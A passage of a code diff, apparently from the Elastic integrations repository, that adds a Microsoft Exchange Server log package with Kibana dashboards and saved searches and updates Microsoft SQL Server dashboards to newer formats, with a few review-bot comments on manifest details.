"id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.authenticateduser" + }, + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "c9c5c37e-da56-4106-b488-560a5da4a1f8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb", + "w": 16, + "x": 32, + "y": 15 + }, + "panelIndex": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 27, + "i": "f2260518-d4c1-4b3b-a602-c18c06fc1562", + "w": 48, + "x": 0, + "y": 30 + }, + "panelIndex": "f2260518-d4c1-4b3b-a602-c18c06fc1562", + "panelRefName": 
"panel_f2260518-d4c1-4b3b-a602-c18c06fc1562", + "type": "search" + } + ], + "timeRestore": false, + "title": "[Logs Exchange Server] HTTPProxy", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:15:01.086Z", + "id": "microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88", + "managed": true, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2e19276-b24c-4239-ab0f-3b9c328fb252:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2e19276-b24c-4239-ab0f-3b9c328fb252:e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8a0f3277-f4af-40f5-9526-0b8be36b2daf:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8cd05d59-543a-4b41-9bdd-49b7b8e2cd31:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba:db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91:7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2997a185-6ea5-4e41-bd70-f5a46bd4e127:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"2997a185-6ea5-4e41-bd70-f5a46bd4e127:b3936adc-f4db-45b1-845e-a13a7c890d2c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3:indexpattern-datasource-layer-f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3:46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0720a83e-43d7-4993-8072-26be8aa3feb6:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0720a83e-43d7-4993-8072-26be8aa3feb6:2f74c5df-c534-4145-a74f-8489c346879e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "70ef3233-def0-42d0-9b35-2e48221fcd16:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "70ef3233-def0-42d0-9b35-2e48221fcd16:af78ff4d-82f1-410b-8478-0732fffc9e5b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb:indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4f7e8e5e-8dc8-4fe7-98b1-16ce0cc6cbcb:c9c5c37e-da56-4106-b488-560a5da4a1f8", + "type": "index-pattern" + }, + { + "id": "microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af", + "name": "f2260518-d4c1-4b3b-a602-c18c06fc1562:panel_f2260518-d4c1-4b3b-a602-c18c06fc1562", + "type": "search" + }, + { + "id": "logs-*", + "name": "controlGroup_a5fe2192-b77c-4f16-888e-4e59fe064c78:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_f542c63c-4265-4ebc-a9d6-7278f4d3976a:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + 
"typeMigrationVersion": "8.9.0" +} diff --git a/packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json similarity index 57% rename from packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json rename to packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json index cee2784d89d..1beffc5ea94 100644 --- a/packages/system/kibana/search/system-ce71c9a0-a25e-11e9-a422-d144027429da.json +++ b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af.json @@ -1,14 +1,18 @@ { "attributes": { "columns": [ - "user.name", - "winlog.logon.type", - "source.domain", - "source.ip", - "winlog.logon.id" + "http.request.bytes", + "http.response.bytes", + "http.response.status_code", + "microsoft.exchange.anchormailbox", + "microsoft.exchange.authenticateduser", + "microsoft.exchange.urlhost", + "microsoft.exchange.totalrequesttime" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ 
@@ -20,30 +24,25 @@ "alias": null, "disabled": false, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", + "key": "data_stream.dataset", "negate": false, "params": { - "query": "4624" + "query": "microsoft_exchange_server.httpproxy" }, "type": "phrase" }, "query": { - "match": { - "event.code": { - "query": "4624", - "type": "phrase" - } + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" } } } ], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true + "query": "" + } } }, "sort": [ @@ -52,15 +51,15 @@ "desc" ] ], - "title": "User Logons [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-ce71c9a0-a25e-11e9-a422-d144027429da", - "migrationVersion": { - "search": "8.0.0" + "timeRestore": false, + "title": "[Logs Exchange Server] HTTP Proxy Requests", + "usesAdHocDataView": false, + "viewMode": "documents" }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af", + "managed": true, "references": [ { "id": "logs-*", @@ -73,5 +72,6 @@ "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file 
diff --git a/packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json similarity index 67% rename from packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json rename to packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json index 95c1065fc34..0dacd4c026d 100644 --- a/packages/microsoft_sqlserver/kibana/search/microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3.json +++ b/packages/microsoft_exchange_server/kibana/search/microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af.json @@ -1,25 +1,17 @@ { "attributes": { "columns": [ - "microsoft_sqlserver.log.origin", - "message", - "event.original" + "email.direction", + "email.from.address", + "email.to.address", + "email.subject", + "email.message_id", + "network.bytes" ], - "description": "Microsoft SQL server Error Log", - "grid": { - "columns": { - "log.level": { - "width": 119 - }, - "message": { - "width": 336.33333333333337 - }, - "microsoft_sqlserver.log.origin": { - "width": 218.33333333333331 - } - } - }, + "description": "", + "grid": {}, "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -30,17 +22,18 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "key": "data_stream.dataset", "negate": false, "params": { - "query": "microsoft_sqlserver.log" + "query": "microsoft_exchange_server.messagetracking" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "microsoft_sqlserver.log" + "data_stream.dataset": "microsoft_exchange_server.messagetracking" } } } 
@@ -58,13 +51,14 @@ "desc" ] ], - "title": "Microsoft SQL server Error Log" - }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3", - "migrationVersion": { - "search": "8.0.0" + "timeRestore": false, + "title": "[Logs Exchange Server] Messagetracking", + "usesAdHocDataView": false }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af", + "managed": true, "references": [ { "id": "logs-*", @@ -77,5 +71,6 @@ "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/microsoft_exchange_server/manifest.yml b/packages/microsoft_exchange_server/manifest.yml new file mode 100644 index 00000000000..1b62ad6d1d6 --- /dev/null +++ b/packages/microsoft_exchange_server/manifest.yml 
@@ -0,0 +1,45 @@ +format_version: 3.0.3 +name: microsoft_exchange_server +title: "Microsoft Exchange Server" +version: 0.1.2 +source: + license: "Elastic-2.0" +description: Collect logs from Microsoft Exchange Server with Elastic Agent. +type: integration +categories: + - security +conditions: + kibana: + version: "^8.10.1" + elastic: + subscription: "basic" +screenshots: + - src: /img/screenshot_messagtracking.png + title: Screenshot MessageTracking Dashboard + size: 600x600 + type: image/png + - src: /img/screenshot_httpproxy.png + title: Screenshot HTTPProxy Dashboard + size: 600x600 + type: image/png +icons: + - src: /img/exchange.svg + title: Exchange Server logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: microsoft_exchange_server + title: Microsoft Exchange Server + description: Microsoft Exchange Server Logs + data_streams: + - smtp + - httpproxy + - messagetracking + - imap4_pop3 + inputs: + - type: filestream + title: Collect Microsoft Exchange Server Logs from file + description: Microsoft Exchange Server Logs +owner: + github: elastic/sec-windows-platform + type: community diff --git a/packages/microsoft_exchange_server/validation.yml b/packages/microsoft_exchange_server/validation.yml new file mode 100644 index 00000000000..1189aa63c89 --- /dev/null +++ b/packages/microsoft_exchange_server/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00004 # References in dashboards. diff --git a/packages/microsoft_sqlserver/changelog.yml b/packages/microsoft_sqlserver/changelog.yml index 508a5afe6dc..fd3f9fbd5a7 100644 --- a/packages/microsoft_sqlserver/changelog.yml +++ b/packages/microsoft_sqlserver/changelog.yml 
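Review bot: The first screenshot entry in manifest.yml points at `src: /img/screenshot_messagtracking.png` (no "e" in "message") while its title reads "Screenshot MessageTracking Dashboard"; unless the asset under `img/` really carries that spelling, the reference will not resolve when the package is built, so either rename the asset or change the line to `src: /img/screenshot_messagetracking.png`. Separately, `owner.github: elastic/sec-windows-platform` combined with `owner.type: community` reads as inconsistent — a team under the elastic GitHub org usually indicates an Elastic-maintained package — and the owner type is what users see as the support expectation, so confirm which is intended. `version: 0.1.2` on a manifest added as a new file also implies earlier releases exist; worth checking it lines up with the package changelog, which is not part of this hunk.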
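Review bot: The `SVR00004` exclusion in validation.yml is justified only by `# References in dashboards.`, which restates the check rather than recording why this package needs it. Which references trigger the check is not visible here, but the HTTPProxy dashboard in this diff carries index-pattern references to `logs-*` plus a `search` reference to `microsoft_exchange_server-75b14bd0-c034-11ee-a682-0f218cc418af` for the `panelRefName: "panel_f2260518-…"` panel, while every other panel is inlined. Suggest spelling that out, e.g. `- SVR00004 # dashboards embed the package's saved searches by reference (search panels)`, so a later maintainer knows when the exclusion can be removed. Note the exclusion is package-wide and will also silence the check for dashboards added later.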
@@ -1,4 +1,14 @@ # newer versions go on top +- version: 2.5.0 + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "2.4.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/9053 - version: 2.4.0 changes: - description: Update the "Microsoft SQL Server Transaction log" dashboard. diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json index 0e3a023d726..b0df96ee7de 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMSwxXQ==", "attributes": { "controlGroupInput": { "chainingSystem": "HIERARCHICAL", @@ -1277,10 +1288,6 @@ "title": "[Metrics Microsoft SQL Server] Transaction log", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-11-10T10:41:08.548Z", - "id": "microsoft_sqlserver-18d66970-1fb4-11e9-8a4d-eb34d2834f6b", - "managed": false, "references": [ { "id": "metrics-*", @@ -1333,8 +1340,7 @@ "type": "index-pattern" } ], - "type": "dashboard", - "migrationVersion": { - "dashboard": "8.9.0" - } + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file 
diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json index f083eea8e31..96f4d45fdc9 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMiwxXQ==", "attributes": { "description": "Microsoft SQL Server Audit Events", "hits": 0, @@ -40,6 +51,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "842e1cfc-7341-462d-8949-eef99e130666", + "w": 18, + "x": 0, + "y": 0 + }, + "panelIndex": "842e1cfc-7341-462d-8949-eef99e130666", "embeddableConfig": { "attributes": { "references": [ @@ -61,7 +82,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b51d3b6d-d5e8-4631-b11c-81dcb81734a8": { "columnOrder": [ @@ -131,16 +152,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "70000b7b-124a-439e-8ef2-6a8dad15c166" - ], "layerId": "b51d3b6d-d5e8-4631-b11c-81dcb81734a8", "layerType": "data", "legendDisplay": "default", "legendSize": "auto", - "metric": "a6937f39-2999-4be2-8371-619b5bf2fb67", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "70000b7b-124a-439e-8ef2-6a8dad15c166" + ], + "metrics": [ + "a6937f39-2999-4be2-8371-619b5bf2fb67" + ] } ], "shape": "donut" 
@@ -158,19 +181,19 @@ }, "type": "lens" }, + "title": "Microsoft SQL Server Event Types" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "842e1cfc-7341-462d-8949-eef99e130666", - "w": 18, - "x": 0, + "i": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", + "w": 17, + "x": 18, "y": 0 }, - "panelIndex": "842e1cfc-7341-462d-8949-eef99e130666", - "title": "Microsoft SQL Server Event Types", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", "embeddableConfig": { "attributes": { "references": [ @@ -192,7 +215,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7af1e8e7-5f23-4195-b8e1-94f90b0a840a": { "columnOrder": [ @@ -311,19 +334,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Rate of events" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", - "w": 17, - "x": 18, + "i": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", + "w": 13, + "x": 35, "y": 0 }, - "panelIndex": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", - "title": "Rate of events", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", "embeddableConfig": { "attributes": { "references": [ @@ -345,7 +368,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7af1e8e7-5f23-4195-b8e1-94f90b0a840a": { "columnOrder": [ 
@@ -476,19 +499,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Rate of Failed Logins" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 13, - "i": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", + "h": 9, + "i": "9df96bf5-959d-470c-afaa-f85cd3921d41", "w": 13, - "x": 35, - "y": 0 + "x": 0, + "y": 13 }, - "panelIndex": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", - "title": "Rate of Failed Logins", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "9df96bf5-959d-470c-afaa-f85cd3921d41", "embeddableConfig": { "attributes": { "references": [ @@ -520,7 +543,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ @@ -728,19 +751,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Database Principal Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "9df96bf5-959d-470c-afaa-f85cd3921d41", + "i": "c95238d4-553e-424f-9880-7377837f0ba2", "w": 13, - "x": 0, + "x": 13, "y": 13 }, - "panelIndex": "9df96bf5-959d-470c-afaa-f85cd3921d41", - "title": "Database Principal Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c95238d4-553e-424f-9880-7377837f0ba2", "embeddableConfig": { "attributes": { "references": [ @@ -772,7 +795,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ 
@@ -963,19 +986,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Role Member Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "c95238d4-553e-424f-9880-7377837f0ba2", + "i": "c48ea73e-2a8d-41bf-831c-275c516ee481", "w": 13, - "x": 13, + "x": 26, "y": 13 }, - "panelIndex": "c95238d4-553e-424f-9880-7377837f0ba2", - "title": "Role Member Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c48ea73e-2a8d-41bf-831c-275c516ee481", "embeddableConfig": { "attributes": { "references": [ @@ -1007,7 +1030,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ @@ -1230,19 +1253,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Audit Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "c48ea73e-2a8d-41bf-831c-275c516ee481", - "w": 13, - "x": 26, + "i": "c68c4401-b3a5-486a-8e66-da4bad6b035d", + "w": 9, + "x": 39, "y": 13 }, - "panelIndex": "c48ea73e-2a8d-41bf-831c-275c516ee481", - "title": "Audit Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c68c4401-b3a5-486a-8e66-da4bad6b035d", "embeddableConfig": { "attributes": { "references": [ @@ -1269,7 +1292,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "03553b27-f941-4b4b-bcb6-8e1943c154f3": { "columnOrder": [ 
@@ -1348,34 +1371,19 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false, "type": "lens" }, - "gridData": { - "h": 9, - "i": "c68c4401-b3a5-486a-8e66-da4bad6b035d", - "w": 9, - "x": 39, - "y": 13 - }, - "panelIndex": "c68c4401-b3a5-486a-8e66-da4bad6b035d", - "title": "Number of Failed Logins", - "type": "lens", - "version": "8.4.0" + "title": "Number of Failed Logins" } ], "timeRestore": false, "title": "[Logs Microsoft SQL Server Audit Events] Overview", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ { "id": "logs-*", @@ -1523,5 +1531,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json index aeb63459627..5b31b58c912 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMywxXQ==", "attributes": { "description": "Error Logs of Microsoft SQL server overview", "hits": 0, 
@@ -19,7 +30,51 @@ "panelsJSON": [ { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "microsoft_sqlserver.log.origin", + "message", + "event.original" + ], + "description": "Microsoft SQL server Error Log", + "grid": { + "columns": { + "log.level": { + "width": 119 + }, + "message": { + "width": 336.33333333333337 + }, + "microsoft_sqlserver.log.origin": { + "width": 218.33333333333331 + } + } + }, + "hideChart": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"microsoft_sqlserver.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"microsoft_sqlserver.log\"}}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"\"}}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Microsoft SQL server Error Log", + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 25, @@ -29,11 +84,20 @@ "y": 12 }, "panelIndex": "acfd02ea-6f4d-4582-8a3e-8a43d3461128", - "panelRefName": "panel_acfd02ea-6f4d-4582-8a3e-8a43d3461128", "type": "search", - "version": "8.3.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", "embeddableConfig": { "attributes": { "references": [ 
@@ -45,7 +109,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "056140ff-8a51-44be-9c14-76e4418d0587": { "columnOrder": [ @@ -159,39 +223,31 @@ "enhancements": {}, "type": "lens" }, - "gridData": { - "h": 12, - "i": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", - "title": "Microsoft SQL server Error Log origin", - "type": "lens", - "version": "8.4.0" + "title": "Microsoft SQL server Error Log origin" } ], "timeRestore": false, "title": "[Logs Microsoft SQL Server] Error Log Overview", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ - { - "id": "microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3", - "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:panel_acfd02ea-6f4d-4582-8a3e-8a43d3461128", - "type": "search" - }, { "id": "logs-*", "name": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f:indexpattern-datasource-layer-056140ff-8a51-44be-9c14-76e4418d0587", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json index faa45de9977..348df575b01 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json 
